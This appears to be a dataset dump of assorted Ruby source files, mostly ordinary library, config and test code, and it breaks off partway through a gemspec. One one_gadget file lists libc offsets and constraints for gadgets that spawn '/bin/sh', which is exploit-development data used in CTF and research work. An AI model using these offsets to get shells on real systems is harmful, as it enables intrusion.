hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
110db494f5aded2d546d90b369aa826bef436561 | 569 | # frozen_string_literal: true
module ReleaseTools
module SharedStatus
extend self
def dry_run?
ENV['TEST'].present?
end
def critical_security_release?
ENV['SECURITY'] == 'critical'
end
def security_release?
return true if ENV['SECURITY'].present?
@security_release == true
end
def as_security_release(security_release = true)
@security_release = security_release
yield
ensure
@security_release = false
end
def user
`git config --get user.name`.strip
end
end
end
| 17.242424 | 52 | 0.650264 |
21750a3be6bc218ffb8bb7cca20eb7fdd23a0386 | 188 | class Version
include Mongoid::Document
include Mongoid::Timestamps::Created
field :title
field :body
belongs_to :article
belongs_to :user
index({ :article_id => 1 })
end
| 14.461538 | 38 | 0.712766 |
e2be813723359d7b29839477f2f73b91929cec95 | 441 | # frozen_string_literal: false
require 'spec_helper'
RSpec.describe Struct do
let(:s1) do
person = described_class.new(:name, :age)
person.new('bob', 60)
end
describe '#attributes' do
it 'to be { ... }' do
expect(s1.attributes).to eq(name: 'bob', age: 60)
end
end
describe '#replace' do
it 'to be "tom"' do
s1.replace(name: 'tom', age: 28)
expect(s1.name).to eq('tom')
end
end
end
| 16.961538 | 55 | 0.600907 |
879e0987ff70b26cb879bf8fd18a53a7d30b3aba | 644 | require "fog/core/model"
module Fog
module Google
class SQL
##
# A Google Cloud SQL service flag resource
#
# @see https://cloud.google.com/sql/docs/mysql/admin-api/v1beta4/flags
class Flag < Fog::Model
identity :name
attribute :allowed_string_values, :aliases => "allowedStringValues"
attribute :applies_to, :aliases => "appliesTo"
attribute :kind
attribute :max_value, :aliases => "maxValue"
attribute :min_value, :aliases => "minValue"
attribute :requires_restart, :aliases => "requiresRestart"
attribute :type
end
end
end
end
| 26.833333 | 76 | 0.631988 |
5d87a943a5dd1828aacdee8b16187f847bcffac9 | 767 | module Releasetool
module Util
DIR = "release_notes"
VERSION_FILE = ENV['RELEASETOOL_VERSION_FILE'] || "config/initializers/00-version.rb" #rails out of box
TEMPLATE_FILE = "__TEMPLATE__.md" # relative to DIR
RELEASE_MARKER_FILE = ".RELEASE_NEW_VERSION" # should be a config var
def stored_version
fail Thor::Error.new("No stored version... did you forget to do release start?") unless File.exist?(RELEASE_MARKER_FILE)
File.read(RELEASE_MARKER_FILE).strip
end
def remove_stored_version
guarded_system("rm #{RELEASE_MARKER_FILE}") if File.exist?(RELEASE_MARKER_FILE)
end
def guarded_system(command)
puts command
system(command) or raise Thor::Error.new("Couldn't '#{command}'")
end
end
end
| 31.958333 | 126 | 0.713168 |
ed32dd149060e5f8ea6c0bd96f43bd6438bca972 | 3,789 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Attempt to read encrypted secrets from `config/secrets.yml.enc`.
# Requires an encryption key in `ENV["RAILS_MASTER_KEY"]` or
# `config/secrets.yml.key`.
config.read_encrypted_secrets = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Compress JavaScripts and CSS.
config.assets.js_compressor = :uglifier
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# `config.assets.precompile` and `config.assets.version` have moved to config/initializers/assets.rb
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Mount Action Cable outside main process or domain
# config.action_cable.mount_path = nil
# config.action_cable.url = 'wss://example.com/cable'
# config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Use the lowest log level to ensure availability of diagnostic information
# when problems arise.
config.log_level = :debug
# Prepend all log lines with the following tags.
config.log_tags = [ :request_id ]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment)
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "quora_clone_#{Rails.env}"
config.action_mailer.perform_caching = false
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Use a different logger for distributed setups.
# require 'syslog/logger'
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV["RAILS_LOG_TO_STDOUT"].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
end
| 41.184783 | 102 | 0.757192 |
ac2a483e5fd469115260e05895e40268931cafb9 | 767 | Pod::Spec.new do |s|
s.name = 'Collor'
s.version = '1.1.23'
s.summary = 'A MVVM data-oriented framework for UICollectionView.'
s.homepage = 'https://github.com/voyages-sncf-technologies/Collor'
s.screenshots = 'https://raw.githubusercontent.com/voyages-sncf-technologies/Collor/master/resources/screenshot.jpg'
s.license = { :type => 'BSD', :file => 'LICENSE' }
s.author = { 'Gwenn Guihal' => '[email protected]' }
s.source = { :git => 'https://github.com/voyages-sncf-technologies/Collor.git', :tag => s.version.to_s }
s.social_media_url = 'https://twitter.com/_myrddin_'
s.ios.deployment_target = '8.0'
s.source_files = 'Collor/Classes/**/*'
s.swift_version = '4.0'
end
| 51.133333 | 123 | 0.6206 |
62fd99bd254980538ab7ec89879c68333300d81f | 1,164 | # == Schema Information
#
# Table name: users
#
# id :integer not null, primary key
# email :string(255) default(""), not null
# encrypted_password :string(255) default(""), not null
# reset_password_token :string(255)
# reset_password_sent_at :datetime
# remember_created_at :datetime
# sign_in_count :integer default(0), not null
# current_sign_in_at :datetime
# last_sign_in_at :datetime
# current_sign_in_ip :string(255)
# last_sign_in_ip :string(255)
# created_at :datetime not null
# updated_at :datetime not null
# role_id :integer
# approved :boolean default(FALSE), not null
#
module UsersHelper
# Returns the Gravatar (http://gravatar.com/) for the given user.
def gravatar_for(user, options = { size: 50 })
gravatar_id = Digest::MD5::hexdigest(user.email.downcase)
size = options[:size]
gravatar_url = "https://secure.gravatar.com/avatar/#{gravatar_id}?s=#{size}"
image_tag(gravatar_url, alt: user.name, class: "gravatar")
end
end
| 36.375 | 80 | 0.609966 |
e906a176e008b3b7b83a02b00fe95562feaf8c7b | 1,438 | #
# Cookbook Name:: delivery-cluster
# Spec:: delivery_spec
#
# Author:: Salim Afiune (<[email protected]>)
#
# Copyright:: Copyright (c) 2015 Chef Software, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'spec_helper'
describe 'delivery-cluster::delivery' do
let(:chef_run) do
ChefSpec::SoloRunner.new do |node|
node.set['delivery-cluster'] = cluster_data
end.converge(described_recipe)
end
before do
allow(File).to receive(:exist?).and_return(true)
end
it 'upgrades delivery through chef-ingredient' do
expect(chef_run).to upgrade_chef_ingredient('delivery')
end
it 'creates /etc/delivery directory' do
expect(chef_run).to create_directory('/etc/delivery')
end
it 'creates /etc/delivery/delivery.rb configuration file' do
expect(chef_run).to render_file('/etc/delivery/delivery.rb')
.with_content('delivery_fqdn')
end
end
| 29.346939 | 74 | 0.733658 |
e979fe29791aba7ba4442db39301c690dbdb37e6 | 600 | # frozen_string_literal: true
require 'grpc_mock/api'
require 'grpc_mock/version'
require 'grpc_mock/configuration'
require 'grpc_mock/adapter'
require 'grpc_mock/stub_registry'
module GrpcMock
extend GrpcMock::Api
class << self
def enable!
adapter.enable!
end
def disable!
adapter.disable!
end
def reset!
GrpcMock.stub_registry.reset!
end
def stub_registry
@stub_registry ||= GrpcMock::StubRegistry.new
end
def adapter
@adapter ||= Adapter.new
end
def config
@config ||= Configuration.new
end
end
end
| 15.789474 | 51 | 0.67 |
bf756a0dd5978afae267e01393ba345a853298bc | 826 | require 'spec_helper'
describe Signalwire::Relay::Calling::SendDigits do
let(:client) { Signalwire::Relay::Client.new(project: 'myproject', token: 'mytoken') }
let(:call) { Signalwire::Relay::Calling::Call.new(client, mock_call_hash.dig(:params, :params, :params)) }
let(:digits) { '1234' }
subject { described_class.new(call: call, digits: digits) }
let(:mock_protocol) { "my-protocol" }
before do
call.client.protocol = "my-protocol"
end
describe "#execute_params" do
it "merges all values correctly" do
expect(subject.execute_params).to eq({
method: subject.method,
protocol: mock_protocol,
params: {
call_id: call.id,
control_id: subject.control_id,
node_id: call.node_id,
digits: digits
}
})
end
end
end | 28.482759 | 108 | 0.640436 |
87c4bf81b95d55b267c4991b5abcefa9e37ccdf4 | 475 | cask :v1 => 'propresenter' do
version '5.2.8'
sha256 '47981ded0b025db373897b0103e9fa2894f4f0a073596da3725a739d33716e11'
url "https://www.renewedvision.com/downloads/ProPresenter5_#{version}_b11499.dmg"
appcast 'https://www.renewedvision.com/update/ProPresenter5.php',
:sha256 => 'f70029136ad0273f64bdbe6eff1d838e18dba1a1e0c3fe6e85c88909fe4cbf64'
homepage 'http://www.renewedvision.com/propresenter.php'
license :unknown
app 'ProPresenter 5.app'
end
| 36.538462 | 87 | 0.783158 |
bfb0086ac2d38495b4fe0e87d961828bfef75e71 | 7,732 | # Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
require 'date'
# rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength
module OCI
# An array of metric objects containing raw metric data points to be posted to the Monitoring service.
#
class Monitoring::Models::PostMetricDataDetails
BATCH_ATOMICITY_ENUM = [
BATCH_ATOMICITY_ATOMIC = 'ATOMIC'.freeze,
BATCH_ATOMICITY_NON_ATOMIC = 'NON_ATOMIC'.freeze
].freeze
# **[Required]** A metric object containing raw metric data points to be posted to the Monitoring service.
#
# @return [Array<OCI::Monitoring::Models::MetricDataDetails>]
attr_accessor :metric_data
# Batch atomicity behavior. Requires either partial or full pass of input validation for
# metric objects in PostMetricData requests. The default value of NON_ATOMIC requires a
# partial pass: at least one metric object in the request must pass input validation, and
# any objects that failed validation are identified in the returned summary, along with
# their error messages. A value of ATOMIC requires a full pass: all metric objects in
# the request must pass input validation.
#
# Example: `NON_ATOMIC`
#
# @return [String]
attr_reader :batch_atomicity
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
# rubocop:disable Style/SymbolLiteral
'metric_data': :'metricData',
'batch_atomicity': :'batchAtomicity'
# rubocop:enable Style/SymbolLiteral
}
end
# Attribute type mapping.
def self.swagger_types
{
# rubocop:disable Style/SymbolLiteral
'metric_data': :'Array<OCI::Monitoring::Models::MetricDataDetails>',
'batch_atomicity': :'String'
# rubocop:enable Style/SymbolLiteral
}
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
# @option attributes [Array<OCI::Monitoring::Models::MetricDataDetails>] :metric_data The value to assign to the {#metric_data} property
# @option attributes [String] :batch_atomicity The value to assign to the {#batch_atomicity} property
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
self.metric_data = attributes[:'metricData'] if attributes[:'metricData']
raise 'You cannot provide both :metricData and :metric_data' if attributes.key?(:'metricData') && attributes.key?(:'metric_data')
self.metric_data = attributes[:'metric_data'] if attributes[:'metric_data']
self.batch_atomicity = attributes[:'batchAtomicity'] if attributes[:'batchAtomicity']
self.batch_atomicity = "NON_ATOMIC" if batch_atomicity.nil? && !attributes.key?(:'batchAtomicity') # rubocop:disable Style/StringLiterals
raise 'You cannot provide both :batchAtomicity and :batch_atomicity' if attributes.key?(:'batchAtomicity') && attributes.key?(:'batch_atomicity')
self.batch_atomicity = attributes[:'batch_atomicity'] if attributes[:'batch_atomicity']
self.batch_atomicity = "NON_ATOMIC" if batch_atomicity.nil? && !attributes.key?(:'batchAtomicity') && !attributes.key?(:'batch_atomicity') # rubocop:disable Style/StringLiterals
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Custom attribute writer method checking allowed values (enum).
# @param [Object] batch_atomicity Object to be assigned
def batch_atomicity=(batch_atomicity)
raise "Invalid value for 'batch_atomicity': this must be one of the values in BATCH_ATOMICITY_ENUM." if batch_atomicity && !BATCH_ATOMICITY_ENUM.include?(batch_atomicity)
@batch_atomicity = batch_atomicity
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# Checks equality by comparing each attribute.
# @param [Object] other the other object to be compared
def ==(other)
return true if equal?(other)
self.class == other.class &&
metric_data == other.metric_data &&
batch_atomicity == other.batch_atomicity
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# @see the `==` method
# @param [Object] other the other object to be compared
def eql?(other)
self == other
end
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[metric_data, batch_atomicity].hash
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /^Array<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
public_method("#{key}=").call(
attributes[self.class.attribute_map[key]]
.map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) }
)
end
elsif !attributes[self.class.attribute_map[key]].nil?
public_method("#{key}=").call(
OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]])
)
end
# or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = public_method(attr).call
next if value.nil? && !instance_variable_defined?("@#{attr}")
hash[param] = _to_hash(value)
end
hash
end
private
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
# rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
| 39.85567 | 245 | 0.693482 |
d5ed894e7cc0b5b80a5d56be67d2c3e5f1afd95b | 2,178 | require 'one_gadget/gadget'
# https://gitlab.com/libcdb/libcdb/blob/master/libc/libc0.1-i686-2.19-18+deb8u3/lib/i386-kfreebsd-gnu/i686/cmov/libc-2.19.so
#
# Intel 80386
#
# GNU C Library (Debian GLIBC 2.19-18+deb8u3) stable release version 2.19, by Roland McGrath et al.
# Copyright (C) 2014 Free Software Foundation, Inc.
# This is free software; see the source for copying conditions.
# There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
# PARTICULAR PURPOSE.
# Compiled by GNU CC version 4.8.4.
# Available extensions:
# crypt add-on version 2.1 by Michael Glad and others
# Native POSIX Threads Library by Ulrich Drepper et al
# GNU Libidn by Simon Josefsson
# BIND-8.2.3-T5B
# libc ABIs: UNIQUE
# For bug reporting instructions, please see:
# <http://www.debian.org/Bugs/>.
build_id = File.basename(__FILE__, '.rb').split('-').last
OneGadget::Gadget.add(build_id, 248423,
constraints: ["ebx is the GOT address of libc", "[esp+0x38] == NULL"],
effect: "execve(\"/bin/sh\", esp+0x38, environ)")
OneGadget::Gadget.add(build_id, 248459,
constraints: ["ebx is the GOT address of libc", "[eax] == NULL || eax == NULL", "[[esp+0x8]] == NULL || [esp+0x8] == NULL"],
effect: "execve(\"/bin/sh\", eax, [esp+0x8])")
OneGadget::Gadget.add(build_id, 248463,
constraints: ["ebx is the GOT address of libc", "[[esp+0x4]] == NULL || [esp+0x4] == NULL", "[[esp+0x8]] == NULL || [esp+0x8] == NULL"],
effect: "execve(\"/bin/sh\", [esp+0x4], [esp+0x8])")
OneGadget::Gadget.add(build_id, 406212,
constraints: ["ebx is the GOT address of libc", "[esp+0x8] == NULL"],
effect: "execl(\"/bin/sh\", \"sh\", [esp+0x8])")
OneGadget::Gadget.add(build_id, 406218,
constraints: ["ebx is the GOT address of libc", "eax == NULL"],
effect: "execl(\"/bin/sh\", eax)")
OneGadget::Gadget.add(build_id, 406222,
constraints: ["ebx is the GOT address of libc", "[esp+0x4] == NULL"],
effect: "execl(\"/bin/sh\", [esp+0x4])")
| 53.121951 | 158 | 0.598255 |
39d33344a3e7064c776e0e9ee82520d038f269a6 | 1,474 | # frozen_string_literal: true
RSpec.describe PrawnHtml::Tags::A do
subject(:a) { described_class.new(:a, attributes: { 'style' => 'color: #fb1' }) }
it { expect(described_class).to be < PrawnHtml::Tag }
context 'without attributes' do
before do
a.process_styles
end
it "styles doesn't include the link property" do
expect(a.styles).to eq(color: 'ffbb11', styles: [:underline])
end
end
context 'with an href attribute' do
subject(:a) do
described_class.new(:a, attributes: { 'href' => 'https://www.google.it', 'style' => 'font-weight: bold' })
end
before do
a.process_styles
end
it 'includes the link property in the styles' do
expect(a.styles).to match(color: '0000ee', link: 'https://www.google.it', styles: [:underline, :bold])
end
end
describe 'tag rendering' do
include_context 'with pdf wrapper'
let(:html) { '<a href="https://www.google.it">A link</a>' }
before { append_html_to_pdf(html) }
it 'sends the expected buffer elements to the pdf', :aggregate_failures do
expected_buffer = [{ size: TestUtils.default_font_size, text: 'A link', link: 'https://www.google.it', color: '0000ee', styles: [:underline] }]
expected_options = { leading: TestUtils.adjust_leading }
expected_extra = { bounding_box: nil, left_indent: 0 }
expect(pdf).to have_received(:puts).with(expected_buffer, expected_options, expected_extra)
end
end
end
| 30.708333 | 149 | 0.662822 |
e99a6b4c41d2f5b82350c81057258622e572dee4 | 1,674 | module AcceptanceTest
class << self
def included(klass)
klass.class_eval do
def self.log_to_console
Xeroizer::Logging.const_set :Log, Xeroizer::Logging::StdOutLog
end
def self.no_log
Xeroizer::Logging.const_set :Log, Xeroizer::Logging::DevNullLog
end
def self.let(symbol, &block)
return unless block_given?
unless respond_to? symbol
define_method symbol do
cached_method_result = instance_variable_get ivar_name = "@#{symbol}"
instance_variable_set(ivar_name, instance_eval(&block)) if cached_method_result.nil?
instance_variable_get ivar_name
end
end
end
end
end
end
def setup
config = load_config_from_file || load_config_from_env
@key_file = config.key_file
@consumer_key = config.consumer_key
@consumer_secret = config.consumer_secret
end
private
def load_config_from_file
the_file_name = File.join(File.dirname(__FILE__), '..', '..', '.oauth')
return nil unless File.exists? the_file_name
Xeroizer::OAuthConfig.load IO.read the_file_name
end
def load_config_from_env
assert_not_nil ENV["CONSUMER_KEY"], "No CONSUMER_KEY environment variable specified."
assert_not_nil ENV["CONSUMER_SECRET"], "No CONSUMER_SECRET environment variable specified."
assert_not_nil ENV["KEY_FILE"], "No KEY_FILE environment variable specified."
assert File.exists?(ENV["KEY_FILE"]), "The file <#{ENV["KEY_FILE"]}> does not exist."
Xeroizer::OAuthCredentials.new ENV["CONSUMER_KEY"], ENV["CONSUMER_SECRET"], ENV["KEY_FILE"]
end
end
| 31 | 98 | 0.682198 |
ff46dd5a50dc018a31c4264df416d6a2d233fcdc | 961 | # frozen_string_literal: true
require 'telegram/core_ext'
module Telegram
module API
module Bot
module Types
# See the {https://core.telegram.org/bots/api#maskposition official documentation}.
#
# @!attribute [rw] point
# @return [String]
# @!attribute [rw] x_shift
# @return [Float]
# @!attribute [rw] y_shift
# @return [Float]
# @!attribute [rw] scale
# @return [Float]
MaskPosition = Struct.new(
:point,
:x_shift,
:y_shift,
:scale
) do
include Telegram::CoreExt::Struct
def initialize(
point:,
x_shift:,
y_shift:,
scale:
)
super(
point&.to_s,
x_shift&.to_f,
y_shift&.to_f,
scale&.to_f
)
end
end
end
end
end
end
| 21.355556 | 91 | 0.463059 |
4aa4a20d4c4f4d8c9a503a21a7457393f38f9094 | 1,394 | # frozen_string_literal: true
module Theme
class Project < ShopifyCli::ProjectType
hidden_feature
title("Theme")
creator("Theme::Commands::Create")
connector("Theme::Commands::Connect")
register_command("Theme::Commands::Deploy", "deploy")
register_command("Theme::Commands::Generate", "generate")
register_command("Theme::Commands::Push", "push")
register_command("Theme::Commands::Serve", "serve")
register_task("Theme::Tasks::EnsureThemekitInstalled", :ensure_themekit_installed)
require Project.project_filepath("messages/messages")
register_messages(Theme::Messages::MESSAGES)
end
module Commands
autoload :Connect, Project.project_filepath("commands/connect")
autoload :Create, Project.project_filepath("commands/create")
autoload :Deploy, Project.project_filepath("commands/deploy")
autoload :Generate, Project.project_filepath("commands/generate")
autoload :Push, Project.project_filepath("commands/push")
autoload :Serve, Project.project_filepath("commands/serve")
end
module Tasks
autoload :EnsureThemekitInstalled, Project.project_filepath("tasks/ensure_themekit_installed")
end
module Forms
autoload :Create, Project.project_filepath("forms/create")
autoload :Connect, Project.project_filepath("forms/connect")
end
autoload :Themekit, Project.project_filepath("themekit")
end
| 34 | 98 | 0.753945 |
26b29cf8c9009df054dbbeeea0c7c8b9aa9fb27f | 661 | Pod::Spec.new do |s|
s.name = "SOMessaging"
s.version = "1.0.0"
s.summary = "Messaging library for iOS 7.x "
s.platform = :ios, '7.0'
s.source = { :git => "https://github.com/SocialObjects-Software/SOMessaging.git", :tag => "1.0.0" }
s.description = <<-DESC
This is a simple library to easily create a messaging app with smooth animations.
DESC
s.homepage = 'https://github.com/SocialObjects-Software/SOMessaging'
s.license = 'MIT'
s.author = { "Artur Mkrtchyan" => "[email protected]" }
s.source_files = 'SOMessaging/*'
s.requires_arc = true
end
| 36.722222 | 107 | 0.588502 |
ab95a02b6f1107139b7849d0ee24ed08153d16a5 | 527 | Pod::Spec.new do |s|
s.name = 'Train'
s.version = '0.0.2'
s.summary = 'A simple dependency injection framework for objective c, written while traveling in a train.'
s.homepage = 'https://github.com/tomersh/Train'
s.author = { 'Tomer Shiri' => '[email protected]' }
s.source = { :git => 'https://github.com/tomersh/Train.git', :tag => "v0.0.2" }
s.platform = :ios
s.source_files = 'src/*'
s.requires_arc = false
s.license = { :type => 'NetBSD', :file => 'LICENSE' }
end
| 40.538462 | 113 | 0.586338 |
4a8e969ad0610a75a4466dba8548eb1f2a5b5334 | 307 | require "jekyll"
require "fileutils"
require "fyntech_feed/version"
require "fyntech_feed/generator"
module FyntechFeed
autoload :MetaTag, "fyntech_feed/meta-tag"
autoload :PageWithoutAFile, "fyntech_feed/page-without-a-file.rb"
end
Liquid::Template.register_tag "feed_meta", FyntechFeed::MetaTag
| 25.583333 | 69 | 0.794788 |
1d68a87417e9b9c2c1ad76cf63ca9c4ee841f53e | 7,535 | # frozen_string_literal: true
module Jekyll
class Renderer
attr_reader :document, :site
attr_writer :layouts, :payload
def initialize(site, document, site_payload = nil)
@site = site
@document = document
@payload = site_payload
end
# Fetches the payload used in Liquid rendering.
# It can be written with #payload=(new_payload)
# Falls back to site.site_payload if no payload is set.
#
# Returns a Jekyll::Drops::UnifiedPayloadDrop
def payload
@payload ||= site.site_payload
end
# The list of layouts registered for this Renderer.
# It can be written with #layouts=(new_layouts)
# Falls back to site.layouts if no layouts are registered.
#
# Returns a Hash of String => Jekyll::Layout identified
# as basename without the extension name.
def layouts
@layouts || site.layouts
end
# Determine which converters to use based on this document's
# extension.
#
# Returns Array of Converter instances.
def converters
@converters ||= site.converters.select { |c| c.matches(document.extname) }.sort
end
# Determine the extname the outputted file should have
#
# Returns String the output extname including the leading period.
def output_ext
@output_ext ||= (permalink_ext || converter_output_ext)
end
# Prepare payload and render the document
#
# Returns String rendered document output
def run
Jekyll.logger.debug "Rendering:", document.relative_path
assign_pages!
assign_current_document!
assign_highlighter_options!
assign_layout_data!
Jekyll.logger.debug "Pre-Render Hooks:", document.relative_path
document.trigger_hooks(:pre_render, payload)
render_document
end
# Render the document.
#
# Returns String rendered document output
# rubocop: disable AbcSize
def render_document
info = {
:registers => { :site => site, :page => payload["page"] },
}
output = document.content
if document.render_with_liquid?
Jekyll.logger.debug "Rendering Liquid:", document.relative_path
output = render_liquid(output, payload, info, document.path)
end
Jekyll.logger.debug "Rendering Markup:", document.relative_path
output = convert(output.to_s)
document.content = output
if document.place_in_layout?
Jekyll.logger.debug "Rendering Layout:", document.relative_path
output = place_in_layouts(output, payload, info)
end
output
end
# rubocop: enable AbcSize
# Convert the document using the converters which match this renderer's document.
#
# Returns String the converted content.
def convert(content)
converters.reduce(content) do |output, converter|
begin
converter.convert output
rescue StandardError => e
Jekyll.logger.error "Conversion error:",
"#{converter.class} encountered an error while "\
"converting '#{document.relative_path}':"
Jekyll.logger.error("", e.to_s)
raise e
end
end
end
# Render the given content with the payload and info
#
# content -
# payload -
# info -
# path - (optional) the path to the file, for use in ex
#
# Returns String the content, rendered by Liquid.
def render_liquid(content, payload, info, path = nil)
template = site.liquid_renderer.file(path).parse(content)
template.warnings.each do |e|
Jekyll.logger.warn "Liquid Warning:",
LiquidRenderer.format_error(e, path || document.relative_path)
end
template.render!(payload, info)
# rubocop: disable RescueException
rescue Exception => e
Jekyll.logger.error "Liquid Exception:",
LiquidRenderer.format_error(e, path || document.relative_path)
raise e
end
# rubocop: enable RescueException
# Checks if the layout specified in the document actually exists
#
# layout - the layout to check
#
# Returns Boolean true if the layout is invalid, false if otherwise
def invalid_layout?(layout)
!document.data["layout"].nil? && layout.nil? && !(document.is_a? Jekyll::Excerpt)
end
# Render layouts and place document content inside.
#
# Returns String rendered content
def place_in_layouts(content, payload, info)
output = content.dup
layout = layouts[document.data["layout"].to_s]
validate_layout(layout)
used = Set.new([layout])
# Reset the payload layout data to ensure it starts fresh for each page.
payload["layout"] = nil
while layout
output = render_layout(output, layout, info)
add_regenerator_dependencies(layout)
if (layout = site.layouts[layout.data["layout"]])
break if used.include?(layout)
used << layout
end
end
output
end
# Checks if the layout specified in the document actually exists
#
# layout - the layout to check
# Returns nothing
private
def validate_layout(layout)
return unless invalid_layout?(layout)
Jekyll.logger.warn(
"Build Warning:",
"Layout '#{document.data["layout"]}' requested "\
"in #{document.relative_path} does not exist."
)
end
# Render layout content into document.output
#
# Returns String rendered content
private
def render_layout(output, layout, info)
payload["content"] = output
payload["layout"] = Utils.deep_merge_hashes(layout.data, payload["layout"] || {})
render_liquid(
layout.content,
payload,
info,
layout.relative_path
)
end
private
def add_regenerator_dependencies(layout)
return unless document.write?
site.regenerator.add_dependency(
site.in_source_dir(document.path),
layout.path
)
end
# Set page content to payload and assign pager if document has one.
#
# Returns nothing
private
def assign_pages!
payload["page"] = document.to_liquid
payload["paginator"] = if document.respond_to?(:pager)
document.pager.to_liquid
end
end
# Set related posts to payload if document is a post.
#
# Returns nothing
private
def assign_current_document!
payload["site"].current_document = document
end
# Set highlighter prefix and suffix
#
# Returns nothing
private
def assign_highlighter_options!
payload["highlighter_prefix"] = converters.first.highlighter_prefix
payload["highlighter_suffix"] = converters.first.highlighter_suffix
end
private
def assign_layout_data!
layout = layouts[document.data["layout"]]
if layout
payload["layout"] = Utils.deep_merge_hashes(layout.data, payload["layout"] || {})
end
end
private
def permalink_ext
if document.permalink && !document.permalink.end_with?("/")
permalink_ext = File.extname(document.permalink)
permalink_ext unless permalink_ext.empty?
end
end
private
def converter_output_ext
if output_exts.size == 1
output_exts.last
else
output_exts[-2]
end
end
private
def output_exts
@output_exts ||= converters.map do |c|
c.output_ext(document.extname)
end.compact
end
end
end
| 28.327068 | 89 | 0.645919 |
e277aefc03cb4599af875840c918003328c2c67e | 2,597 | # Generated by jeweler
# DO NOT EDIT THIS FILE DIRECTLY
# Instead, edit Jeweler::Tasks in Rakefile, and run 'rake gemspec'
# -*- encoding: utf-8 -*-
Gem::Specification.new do |s|
s.name = "wunderground"
s.version = "1.2.0"
